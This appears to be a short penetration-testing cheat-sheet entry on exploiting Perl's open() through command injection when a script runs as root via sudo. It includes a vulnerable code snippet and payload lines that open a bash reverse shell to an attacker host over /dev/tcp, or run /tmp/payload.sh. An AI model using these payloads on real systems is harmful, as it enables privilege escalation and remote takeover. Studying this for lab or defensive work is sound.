Perl

Theory

Perl scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, perl scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.

Practice

Open() Command Injection

Assume the ruby script can be executed as root with sudo rights. If it use the open() method and we controll its input, then the script is vulnerable to arbitrary code execution.

sudo -l
    (root): /usr/bin/perl open.pl

Check if we have control over the input of the vulnerable function

my $file = <>;
open(FH, $file);
while (my $line = <FH>) {
  print($line);
}

If we controll some variables passed to this vulnerables functions, we can inject arbitrary code. here is an example of a malicious payloads passed to the open() function:

$ sudo /usr/bin/perl open.pl

|bash -c 'bash -i >& /dev/tcp/<ATTACKING_IP>/9001 0>&1'
bash -c 'bash -i >& /dev/tcp/10.10.14.12/9001 0>&1'|
|/tmp/payload.sh

The | is a built in functionality used to execute the file when opening it. The file must be executable.

References

IppSec - Search

Last updated 1 year ago